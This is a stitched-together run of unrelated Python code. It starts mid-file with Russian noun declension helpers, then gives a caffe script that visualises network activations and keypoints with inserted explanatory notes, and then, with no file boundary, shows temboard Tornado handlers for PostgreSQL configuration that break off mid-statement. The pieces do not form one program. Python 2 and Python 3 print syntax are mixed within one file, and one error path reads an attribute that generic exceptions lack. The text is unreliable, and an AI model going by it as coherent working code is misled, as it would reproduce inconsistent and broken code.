]
return word_forms
# IV6*
def get_plurl_iv6_prim(name: str, inf_0: str, __) -> list:
if inf_0 == 'неод':
smnv = f'{name}'
else:
smnv = f'{name[:-1]}'
word_forms = [
WordForm(f'{name}', '.СмнИ'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(smnv, '.СмнВ'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6*+I13*
def get_plurl_iv6_prim_and_i13(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ1'),
WordForm(f'{name[:-1]}и', '.СмнИ2'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(f'{name}', '.СмнВ1'),
WordForm(f'{name[:-1]}и', '.СмнВ2'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6*+II5*
def get_plurl_iv6_prim_and_ii5_prim(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name}', '.СмнИ1'),
WordForm(f'{name[:-1]}ы', '.СмнИ2'),
WordForm(f'{name[:-1]}', '.СмнР'),
WordForm(f'{name[:-1]}ам', '.СмнД'),
WordForm(f'{name}', '.СмнВ1'),
WordForm(f'{name[:-1]}ы', '.СмнВ2'),
WordForm(f'{name[:-1]}ами', '.СмнТ'),
WordForm(f'{name[:-1]}ах', '.СмнП'),
]
return word_forms
# IV6+I13
def get_plurl_iv6_and_i13(_, __, singl_word_forms: list) -> list:
ser = list(filter(lambda x: x.idf == '.СеР', singl_word_forms))[0].name
word_forms = [
WordForm(f'{ser}', '.СмнИ1'),
WordForm(f'{ser[:-1]}и', '.СмнИ2'),
WordForm(f'{ser[:-1]}', '.СмнР'),
WordForm(f'{ser[:-1]}ам', '.СмнД'),
WordForm(f'{ser}', '.СмнВ1'),
WordForm(f'{ser[:-1]}и', '.СмнВ2'),
WordForm(f'{ser[:-1]}ами', '.СмнТ'),
WordForm(f'{ser[:-1]}ах', '.СмнП'),
]
return word_forms
# V2
def get_plurl_v2(name: str, _, __) -> list:
word_forms = [
WordForm(f'{name[:-2]}е', '.СмнИ'),
WordForm(f'{name[:-2]}', '.СмнР'),
WordForm(f'{name[:-2]}ам', '.СмнД'),
WordForm(f'{name[:-2]}', '.СмнВ'),
WordForm(f'{name[:-2]}ами', '.СмнТ'),
WordForm(f'{name[:-2]}ах', '.СмнП'),
]
return word_forms
# File: visualize_results.py (repo: cbfinn/caffe, license: BSD-2-Clause)

import caffe
import matplotlib.pylab as plt
import numpy as np
import h5py
import copy
def vis_square_color_pts(mydata,pts,timesteps,filterind=[],redpoints=[], padsize=1, padval=0,alpha=1.0, filename=[]):
ind = timesteps[0]
if len(timesteps) == 1:
data = copy.deepcopy(mydata[ind:ind+1,:,:,:].transpose(0,2,3,1))
else:
if len(filterind) > 0:
print("WARNING: points may not be correct")
data = copy.deepcopy(mydata[np.sort(timesteps),:,:,:].transpose(0,2,3,1))
#for i in range(data.shape[0]):
# data[i,:,:,:] -= data[i,:,:,:].max()
# data[i,:,:,:] /= data[i,:,:,:].min()
data -= data.min()
data /= data.max()
img_width = mydata.shape[2]
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data, alpha = alpha)
plt.axis("off")
if len(filterind) != 0:
ax=plt.gca();
NUM_COLORS=len(filterind)
cm = plt.get_cmap('nipy_spectral');
redi = []
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(filterind)):
filteri = filterind[i]
if filteri in redpoints:
redi.append(filteri);
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
else:
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'o', color=cm((1.*i)/NUM_COLORS),markersize=7);
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=10,markeredgecolor=cm((1.*i)/NUM_COLORS),fillstyle='none', markeredgewidth=3.0);
for filteri in redi:
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
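The padding/reshape/transpose sequence above tiles N filters into a near-square mosaic. The same shape arithmetic in isolation, on toy data, so each step's result can be checked directly:

```python
import numpy as np

data = np.zeros((5, 4, 4, 3))   # 5 filters, each 4x4, RGB
padsize, padval = 1, 0

# Grid side: smallest n with n*n >= number of filters (3 for 5 filters).
n = int(np.ceil(np.sqrt(data.shape[0])))
# Pad with blank filters up to n*n, and add a 1-pixel border per tile.
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
assert data.shape == (9, 5, 5, 3)   # a full 3x3 grid of 5x5 tiles

# Interleave grid rows with tile rows, then collapse into one image.
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
assert data.shape == (15, 15, 3)    # one 15x15 RGB mosaic
```

The transpose is the key step: it moves the grid-column axis inside the tile-row axis so that the final reshape stitches tiles side by side instead of concatenating them end to end.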
def vis_square_color_pts_compare(mydata,pts,pts2,timesteps,filterind=[],redpoints=[], padsize=1, padval=0,alpha=1.0, filename=[]):
ind = timesteps[0]
if len(timesteps) == 1:
data = copy.deepcopy(mydata[ind:ind+1,:,:,:].transpose(0,2,3,1))
else:
if len(filterind) > 0:
print("WARNING: points may not be correct")
data = copy.deepcopy(mydata[np.sort(timesteps),:,:,:].transpose(0,2,3,1))
#for i in range(data.shape[0]):
# data[i,:,:,:] -= data[i,:,:,:].max()
# data[i,:,:,:] /= data[i,:,:,:].min()
data -= data.min()
data /= data.max()
img_width = mydata.shape[2]
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data, alpha = alpha)
plt.axis("off")
if len(filterind) != 0:
ax=plt.gca();
NUM_COLORS=len(filterind)
cm = plt.get_cmap('nipy_spectral');
redi = []
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(filterind)):
filteri = filterind[i]
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'x', markersize=12,markeredgecolor=(.894,0,0,1.0),fillstyle='none', markeredgewidth=3.0);
plt.plot((pts2[ind,filteri*2]+1)/2.0*img_width,(pts2[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=12,markeredgecolor=(0,0,.894,0.7),fillstyle='none', markeredgewidth=3.0);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'o', color=cm((1.*i)/NUM_COLORS),markersize=7);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=10);
for filteri in redi:
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
def vis_square_color_pts_compare_discrep(mydata,pts,pts2,timesteps,timesteps2,filterind=[],redpoints=[], padsize=1, padval=0,alpha=1.0, filename=[]):
ind = timesteps[0]
ind2 = timesteps2[0]
if len(timesteps) == 1:
data = copy.deepcopy(mydata[ind:ind+1,:,:,:].transpose(0,2,3,1))
else:
if len(filterind) > 0:
print "WARNING: points may not be correct"
data = copy.deepcopy(mydata[np.sort(timesteps),:,:,:].transpose(0,2,3,1))
#for i in range(data.shape[0]):
# data[i,:,:,:] -= data[i,:,:,:].max()
# data[i,:,:,:] /= data[i,:,:,:].min()
data -= data.min()
data /= data.max()
img_width = mydata.shape[2]
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data, alpha = alpha)
plt.axis("off")
if len(filterind) != 0:
ax=plt.gca();
NUM_COLORS=len(filterind)
cm = plt.get_cmap('nipy_spectral');
redi = []
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(filterind)):
filteri = filterind[i]
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'x', markersize=12,markeredgecolor=(.894,0,0,1.0),fillstyle='none', markeredgewidth=3.0);
plt.plot((pts2[ind2,filteri*2]+1)/2.0*img_width,(pts2[ind2,filteri*2+1]+1)/2.0*img_width,'ob', markersize=12,markeredgecolor=(0,0,.894,0.7),fillstyle='none', markeredgewidth=3.0);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'o', color=cm((1.*i)/NUM_COLORS),markersize=7);
#plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'ob', markersize=10);
for filteri in redi:
plt.plot((pts[ind,filteri*2]+1)/2.0*img_width,(pts[ind,filteri*2+1]+1)/2.0*img_width,'or', markersize=10);
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
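The pad/reshape/transpose sequence repeated in the functions above tiles N images into a near-square mosaic. A minimal standalone sketch of the same trick (the helper name `tile_square` is illustrative, not part of this module):

```python
import numpy as np

def tile_square(data, padsize=1, padval=0):
    """Tile (N, H, W, C) images into one near-square mosaic image."""
    n = int(np.ceil(np.sqrt(data.shape[0])))  # grid side length
    padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
    data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
    # interleave grid rows/cols with image rows/cols, then collapse each pair
    data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
    return data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])

mosaic = tile_square(np.zeros((5, 8, 8, 3)))  # 5 images -> 3x3 grid, 1px padding
print(mosaic.shape)  # (27, 27, 3): 3 * (8 + 1) pixels per side
```

The transpose is what turns the (grid_row, grid_col, img_row, img_col) layout into (grid_row, img_row, grid_col, img_col), so the final reshape concatenates images correctly.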
def vis_square_pts(mydata,pts,timesteps,filterinds,pointinds=[], padsize=1, padval=1, filename=[]):
if len(timesteps) == 1:
t = timesteps[0];
data = -copy.deepcopy(mydata[t:t+1,filterinds,:,:].transpose(1,2,3,0))
else:
assert(len(filterinds) == 1)
i = filterinds[0]
data = -copy.deepcopy(mydata[timesteps,i:i+1,:,:].transpose(0,2,3,1))
for i in range(data.shape[0]):
data[i,:,:,:] -= data[i,:,:,:].min()
data[i,:,:,:] /= data[i,:,:,:].max()
# data -= data.min()
# data /= data.max()
img_width = mydata.shape[2]
print data.max()
print data.min()
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imshow(data[:,:,0], cmap='Greys', interpolation='nearest')
plt.axis("off")
if len(pointinds) != 0:
assert(len(timesteps) == 1)
t = timesteps[0];
#ax=plt.gca();
#NUM_COLORS=len(pointinds)
#cm = plt.get_cmap('nipy_spectral');
#ax.set_color_cycle([cm(1.*i/NUM_COLORS) for i in range(NUM_COLORS)]);
for i in range(len(pointinds)):
filteri = pointinds[i]
plt.plot((pts[t,filteri*2]+1)/2.0*img_width,(pts[t,filteri*2+1]+1)/2.0*img_width,'or');
plt.xlim([0,img_width]);plt.ylim([img_width,0]);
if filename: plt.savefig(filename, bbox_inches='tight')
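Keypoints here are stored in normalized [-1, 1] coordinates; every plot call maps them to pixel space via `(p + 1) / 2.0 * img_width`. A minimal sketch of that mapping and its inverse (helper names are illustrative):

```python
def norm_to_pixel(p, img_width):
    """Map a coordinate from [-1, 1] to [0, img_width] pixel space."""
    return (p + 1) / 2.0 * img_width

def pixel_to_norm(x, img_width):
    """Inverse mapping, from pixel space back to [-1, 1]."""
    return x / float(img_width) * 2.0 - 1.0

print(norm_to_pixel(-1.0, 100))  # 0.0 (left edge)
print(norm_to_pixel(0.0, 100))   # 50.0 (image center)
print(pixel_to_norm(75.0, 100))  # 0.5
```

Note the y-axis is flipped when plotting (`plt.ylim([img_width, 0])`), so the same mapping works for both axes in image coordinates.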
class PoseResults:
def __init__(self, suffix):
plt.rcParams['figure.figsize'] = (10, 10)
prefix = "test_output/"
#prefix = "pose_baseline/"
#pose_output = h5py.File(prefix + suffix + ".h5", "r");
#self.pose = pose_output['data']
#self.pose_gt = pose_output['label']
softmax_output = h5py.File(prefix +"softmax_" + suffix + ".h5", "r");
self.softmax = softmax_output['data']
self.points = softmax_output['label']
conv1_output = h5py.File(prefix +"conv1_"+ suffix + ".h5", "r");
conv2_output = h5py.File(prefix +"conv2_"+ suffix + ".h5", "r");
conv3_output = h5py.File(prefix +"conv3_"+ suffix + ".h5", "r");
self.conv1 = conv1_output['data']
self.conv2 = conv2_output['data']
self.conv3 = conv3_output['data']
self.rgb = conv3_output['label']
#self.get_mean_dist()
#self.order_timesteps()
# defines the distances, and sorts everything in decreasing order of accuracy
def get_mean_dist(self, pt_idx=0):
diff = np.asarray(self.pose)-np.asarray(self.pose_gt);
diff = diff[:,pt_idx*3:pt_idx*3+3,0,0]
diffsq = np.power(diff,2);
eucsq = np.sum(diffsq,1);
print 'network output: ', np.mean(eucsq)/2
euc = np.power(eucsq,0.5);
loss=np.mean(euc);
std_dist = np.std(euc);
print 'mean distance: ', loss
print 'std distance: ', std_dist
self.euc = euc;
def order_timesteps(self):
order = np.argsort(self.euc)
self.euc = np.asarray([self.euc[i] for i in order])
self.rgb = np.asarray([self.rgb[i,:,:,:] for i in order])
self.conv1 = np.asarray([self.conv1[i,:,:,:] for i in order])
self.conv2 = np.asarray([self.conv2[i,:,:,:] for i in order])
self.conv3 = np.asarray([self.conv3[i,:,:,:] for i in order])
self.softmax = np.asarray([self.softmax[i,:,:,:] for i in order])
self.points = np.asarray([self.points[i,:,0,0] for i in order])
# Returns mean and standard deviation in distance for each point and all points together.
def get_mean_dists(self):
all_eucs = []
for pt_idx in range(3):
diff = np.asarray(self.pose)-np.asarray(self.pose_gt);
diff = diff[:,pt_idx*3:pt_idx*3+3,0,0]
diffsq = np.power(diff,2);
eucsq = np.sum(diffsq,1);
print 'network output: ', np.mean(eucsq)/2
euc = np.power(eucsq,0.5);
all_eucs.extend(euc)
loss=np.mean(euc);
std_dist = np.std(euc);
print 'mean distance: ', loss
print 'std distance: ', std_dist
self.euc = euc;
std_dist = np.std(all_eucs);
self.all_eucs = all_eucs
print 'all mean = ', np.mean(all_eucs)
print 'all std = ', np.std(all_eucs)
def vis_rgb(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
vis_square_color_pts(self.rgb, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv1(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv1, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv2(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv2, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv3(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv3, self.points, timesteps, filters, padsize=padsize, padval=padval);
def vis_softmax(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.softmax, self.points, timesteps, filters,padsize=padsize, padval=padval);
def vis_conv3_pts(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.conv3, self.points, timesteps, filters, filters,padsize=padsize, padval=padval);
def vis_softmax_pts(self, timesteps = [], filters = [],padsize=1, padval=0):
if timesteps == []:
timesteps = [0];
if filters == []:
filters = [0]
vis_square_pts(self.softmax, self.points, timesteps, filters, filters,padsize=padsize, padval=padval);
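The `get_mean_dist` method above reduces stacked (x, y, z) predictions to per-sample Euclidean error. The same reduction as a standalone NumPy sketch (function name and array shapes are assumptions for illustration):

```python
import numpy as np

def mean_euclidean_error(pose, pose_gt, pt_idx=0):
    """Mean/std of Euclidean distance for one 3-D point across N samples."""
    diff = np.asarray(pose) - np.asarray(pose_gt)   # (N, 3 * num_points)
    diff = diff[:, pt_idx * 3:pt_idx * 3 + 3]       # this point's x, y, z
    euc = np.sqrt(np.sum(diff ** 2, axis=1))        # per-sample distance
    return float(np.mean(euc)), float(np.std(euc))

pose = np.array([[3.0, 4.0, 0.0], [0.0, 0.0, 0.0]])
gt = np.zeros((2, 3))
print(mean_euclidean_error(pose, gt))  # (2.5, 2.5): distances are 5.0 and 0.0
```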
from os import path
import tornado.web
import tornado.escape
from temboardui.handlers.base import JsonHandler, BaseHandler
from temboardui.temboardclient import (
TemboardError,
temboard_delete_hba_version,
temboard_get_conf_file,
temboard_get_conf_file_raw,
temboard_get_conf_file_versions,
temboard_get_configuration,
temboard_get_configuration_categories,
temboard_get_configuration_status,
temboard_get_file_content,
temboard_get_hba_options,
temboard_post_administration_control,
temboard_post_conf_file,
temboard_post_configuration,
temboard_post_file_content,
temboard_profile,
)
from temboardui.async import (
HTMLAsyncResult,
JSONAsyncResult,
run_background,
)
from temboardui.errors import TemboardUIError
from temboardui.application import get_instance
def configuration(config):
return {}
def get_routes(config):
plugin_path = path.dirname(path.realpath(__file__))
handler_conf = {
'ssl_ca_cert_file': config.temboard['ssl_ca_cert_file'],
'template_path': plugin_path + "/templates"
}
routes = [
(
r"/server/(.*)/([0-9]{1,5})/pgconf/configuration$",
ConfigurationHandler,
handler_conf
),
(
r"/server/(.*)/([0-9]{1,5})/pgconf/configuration/category/(.+)$",
ConfigurationHandler,
handler_conf
),
(
r"/server/(.*)/([0-9]{1,5})/pgconf/hba",
HBAHandler,
handler_conf
),
(
r"/server/(.*)/([0-9]{1,5})/pgconf/pg_ident",
PGIdentHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/administration/control",
AdminControlProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/configuration",
ConfigurationProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/hba/options",
HBAOptionsProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/hba$",
HBAProxyHandler,
handler_conf
),
(
r"/proxy/(.*)/([0-9]{1,5})/pgconf/hba/delete$",
HBADeleteProxyHandler,
handler_conf
),
(
r"/js/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/js"}
),
(
r"/css/pgconf/(.*)",
tornado.web.StaticFileHandler,
{'path': plugin_path + "/static/css"}
),
]
return routes
class ConfigurationHandler(BaseHandler):
""" HTML handler """
def get_configuration(self, agent_address, agent_port, category=None):
try:
self.logger.info("Getting configuration.")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
else:
data_profile = temboard_profile(self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
agent_username = data_profile['username']
configuration_status = temboard_get_configuration_status(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
configuration_cat = temboard_get_configuration_categories(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
query_filter = self.get_argument('filter', None, True)
if category is None:
category = tornado.escape.url_escape(
configuration_cat['categories'][0])
url = tornado.escape.url_escape(
tornado.escape.url_unescape(category))
configuration_data = temboard_get_configuration(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
url,
query_filter)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='configuration.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'data': configuration_data,
'xsession': xsession,
'agent_username': agent_username,
'current_cat': tornado.escape.url_unescape(category),
'configuration_categories': configuration_cat,
'configuration_status': configuration_status,
'query_filter': query_filter
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def get(self, agent_address, agent_port, category=None):
run_background(self.get_configuration, self.async_callback,
(agent_address, agent_port, category))
def post_configuration(self, agent_address, agent_port, category=None):
try:
self.logger.info("Posting configuration.")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
query_filter = self.get_argument('filter', None, True)
error_code = None
error_message = None
post_settings = self.request.arguments
ret_post = None
settings = {'settings': []}
for setting_name, setting_value in post_settings.iteritems():
# 'filter' is not a setting, just ignore it.
if setting_name == 'filter':
continue
settings['settings'].append({'name': setting_name,
'setting': setting_value[0]})
try:
# Try to send settings to the agent.
ret_post = temboard_post_configuration(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
settings)
except TemboardError as e:
error_code = e.code
error_message = e.message
# Get PostgreSQL configuration status: needs restart, reload or is
# fine.
configuration_status = temboard_get_configuration_status(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
# Load settings categories.
configuration_cat = temboard_get_configuration_categories(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession)
if category is None:
category = tornado.escape.url_escape(
configuration_cat['categories'][0])
# Load settings depending on the current category or the filter
# value.
url = tornado.escape.url_escape(
tornado.escape.url_unescape(category))
configuration_data = temboard_get_configuration(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
url,
query_filter)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='configuration.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'data': configuration_data,
'xsession': xsession,
'current_cat': tornado.escape.url_unescape(category),
'configuration_categories': configuration_cat,
'configuration_status': configuration_status,
'error_code': error_code,
'error_message': error_message,
'ret_post': ret_post,
'query_filter': query_filter
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def post(self, agent_address, agent_port, category=None):
run_background(self.post_configuration, self.async_callback,
(agent_address, agent_port, category))
class ConfigurationFileHandler(BaseHandler):
def get_configuration_file(self, agent_address, agent_port):
try:
self.logger.info("Getting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
# Load file content.
file_content = temboard_get_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_file.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_type': self.file_type,
'file_content': file_content,
'xsession': xsession
})
except (TemboardUIError, TemboardError, Exception) as e:
self.logger.exception(str(e))
self.logger.info("Failed.")
try:
self.db_session.expunge_all()
self.db_session.rollback()
self.db_session.close()
except Exception:
pass
if (isinstance(e, TemboardUIError) or
isinstance(e, TemboardError)):
if e.code == 401:
return HTMLAsyncResult(
http_code=401,
redirection="/server/%s/%s/login" %
(agent_address, agent_port))
elif e.code == 302:
return HTMLAsyncResult(http_code=401, redirection="/login")
code = e.code
else:
code = 500
return HTMLAsyncResult(
http_code=code,
template_file='error.html',
data={
'nav': True,
'role': role,
'instance': instance,
'code': e.code,
'error': e.message
})
@tornado.web.asynchronous
def get(self, agent_address, agent_port):
run_background(self.get_configuration_file, self.async_callback,
(agent_address, agent_port))
def post_configuration_file(self, agent_address, agent_port):
error_code = None
error_message = None
ret_post = None
try:
self.logger.info("Posting configuration (file).")
instance = None
role = None
self.load_auth_cookie()
self.start_db_session()
role = self.current_user
if not role:
raise TemboardUIError(302, "Current role unknown.")
instance = get_instance(self.db_session, agent_address, agent_port)
if not instance:
raise TemboardUIError(404, "Instance not found.")
if __name__ not in [plugin.plugin_name
for plugin in instance.plugins]:
raise TemboardUIError(408, "Plugin not active.")
self.db_session.expunge_all()
self.db_session.commit()
self.db_session.close()
xsession = self.get_secure_cookie(
"temboard_%s_%s" %
(instance.agent_address, instance.agent_port))
if not xsession:
raise TemboardUIError(401, "Authentication cookie is missing.")
try:
# Send file content ..
ret_post = temboard_post_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession,
{
'content': self.request.arguments['content'][0],
'new_version': True
}
)
# .. and reload configuration.
ret_post = temboard_post_administration_control(
self.ssl_ca_cert_file,
instance.agent_address,
instance.agent_port,
xsession,
{'action': 'reload'})
except (TemboardError, Exception) as e:
self.logger.exception(str(e))
                if isinstance(e, TemboardError):
error_code = e.code
error_message = e.message
else:
error_code = 500
                    error_message = "Internal error."
# Load file content.
file_content = temboard_get_file_content(
self.ssl_ca_cert_file,
self.file_type,
instance.agent_address,
instance.agent_port,
xsession)
self.logger.info("Done.")
return HTMLAsyncResult(
http_code=200,
template_path=self.template_path,
template_file='edit_file.html',
data={
'nav': True,
'role': role,
'instance': instance,
'plugin': 'pgconf',
'file_type': self.file_type,
'file_content': file_content,
'error_code': error_code,
'error_message': error_message,
